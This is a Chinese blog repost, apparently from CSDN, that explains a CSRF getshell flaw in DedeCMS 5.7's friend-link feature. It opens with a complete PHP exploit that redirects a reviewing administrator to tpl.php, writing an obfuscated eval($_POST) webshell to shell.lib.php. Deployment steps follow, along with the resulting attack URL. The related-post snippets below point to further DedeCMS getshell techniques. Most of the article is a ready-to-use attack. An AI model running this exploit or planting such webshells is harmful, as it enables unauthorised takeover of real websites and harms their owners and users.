DEDECMS最新友情链接getshell漏洞分析

最新推荐文章于 2023-05-31 14:19:32 发布
最新推荐文章于 2023-05-31 14:19:32 发布
阅读量521 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/wh4am1/p/6618927.html
版权

先上exp:

<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

从exp大概可以看出,这里利用管理员的权限写了一个shell.lib.php的一句话文件

从exp就可以判断出,这里应该就是一个CSRF漏洞。下面说一下利用方法。

首先,将这个exp部署在你的服务器上,当然你必须要有一个公网ip,假设你的url为:

  1. http://www.xxxx.com/exp.php`

复制代码

在目标网站的申请友情链接处申请一个友情链接,


友情链接.jpg 

提交

友情链接2.jpg 


提交之后等待管理员审核,当管理员审核的时候,一般情况下会点进你的网站看一看

审核的地方在 后台—》模块—》辅助插件—》友情链接

审核.jpg 

当点这个友情链接的时候,就生成了一句话shell,shell地址在

/include/taglib/shell.lib.php

生成shell.jpg 

管理员触发了一个链接:

  1. http://127.0.0.1/DedeCMS-V5.7-UTF8-SP1-Full/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php

复制代码

这个链接是利用管理员的权限生成了一句话。

shell文件.jpg 

转载于:https://www.cnblogs.com/wh4am1/p/6618927.html

weixin_30815427
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
过防火墙一句话php2017,dedeCMS友情链接getshell漏洞利用
weixin_39849153的博客
03-11 138
1.php//print_r($_SERVER);$referer=$_SERVER['HTTP_REFERER'];$dede_login=str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径//拼接exp$muma=''.'';$exp='tpl.php?actio...
web遇到的疑难杂症库
qq_40800734的博客
06-29 199
0x00 遇到的问题很多当时解决后面又忘了,多次循环后想一想还是记录一下比较好 0x01 一次php中get与post传值的一句话木马问题 源码 先是一个命令执行,老规矩先拿phpinfo()测一下,发现?a=phpinfo();可以而?a=phpinfo()不行 查看文档发现: (PHP 4, PHP 5, PHP 7) eval—把字符串作为PHP代码执行 除此之外,传入的必须是有效的 PHP 代码。所有的语句必须以分号结尾。比如'echo "Hi!"'会导致一个 pars...
dedecms友情链接plus/flink.php页面出错,DedeCMS友情链接flink_add Getshell漏洞管理员CSRF漏洞...
weixin_32581787的博客
03-21 529
DedeCMS友情链接漏洞,DedeCMS漏洞,1、漏洞利用由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。又由于应用没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,从而造成了CSRF漏洞。因此可以诱导管理员以管理员的权限写入代码即可。测试版本:DedeCMS-V5.7-UTF8-SP1-Full 201506...
DedeCMS_v5.7_友情链接CSRF+任意文件写入漏洞
公众号shadow sock7
11-28 2660
参考:https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell 略鸡肋,需要管理员点击。 先在网站最下面点击“申请加入”,然后填入构造的网站链接: http://192.168.170.139:8888/dedecms_csrf.php 然后该链接需要服务器后台可以访问的地址即...
dedecms-v5.7-sp1远程文件包含getshell
What_Happened的博客
12-13 6200
前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发现了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~ 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。       其次,目标站点的Apache存在文件解
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
DEDECMS伪随机漏洞分析 (三) 碰撞点1
08-03
1. 用户主页 2. 自定义表单 1. 保存如下代码到 dede_funcookie.php 2. 修改里面的 $cpu, $attack_method, $a
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3020
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
DedeCms 5.7友情链接模块注入漏洞
weixin_30457551的博客
12-13 302
漏洞版本: DedeCms 5.7 漏洞描述: DedeCms基于PHP+MySQL的技术开发,是目前国内应用最广泛的php类CMS系统。 DedeCms 5.7前台提交友情链接处,可以插入恶意JS代码。 <* 参考 http://0day5.com/archives/925http://sebug.net/appdir/织梦(DedeCms) *> ...
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9783
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2203
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
thinkphp远程代码执行漏洞分析
weixin_43999372的博客
03-10 705
前言 最近刚刚简单学习了thinkphp,所以就看了看thinkphp爆出的代码执行漏洞。第一次看这种代码,所以是根据大佬们所讲的,加大佬们的payload,加手工调试,总算是找到了一些流程 漏洞版本 thinkphp5.1.* 版本 触发条件 thinkphp5 设置 error_reporting(0) 环境 thinkphp5.1.31+php7.2.13+apache 漏洞分析 漏洞文件:...
墨者学院-在线靶场 - CMS系统漏洞分析溯源(第7题)
a519395243的博客
12-25 1419
墨者 在线靶场 CMS系统漏洞分析溯源(第7题) DEDECMS 任意用户密码重置漏洞利用   开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号 利用burp 抓包改 Post http://219.153.49.228:47764/member/resetpassword.php POST /member/resetpassword.php HTTP/1.1 dopo...
dedecms5.7/install/index.php.bak getshell方法(亲测成功)
风炫 致力于顶级网络安全专家
01-30 7554
我是从安全参考上看到这一篇文章,作者:yaseng 。 但是我自己亲自测试了一下,果然存在这个漏洞。 给大家讲下, 原文: Dedecms对于安装程序的处理方法就是重命名install.php+lock文件验证,改install.php  位install.php.bak但是在apache 对这类型文件会解析成php,即可以执行之,对于lock  文件验证,不是还有dedecms的全局
Dedecms V5.7后台的两处getshell
weixin_33921089的博客
01-05 886
在这个帖子里我把两个洞一起写出来。 第一个是常见的思路,把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell漏洞代码在:/dede/sys_verifies.php 代码如下: else if ($action == 'getfiles') { if(!isset($refiles)) { ShowMsg("你...
dedecms前台拿shell
最新发布
08-23
- *1* *2* [灰盒测试之织梦dedecms 5.7 官网最新版 Getshell](https://blog.csdn.net/weixin_29019241/article/details/116323144)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值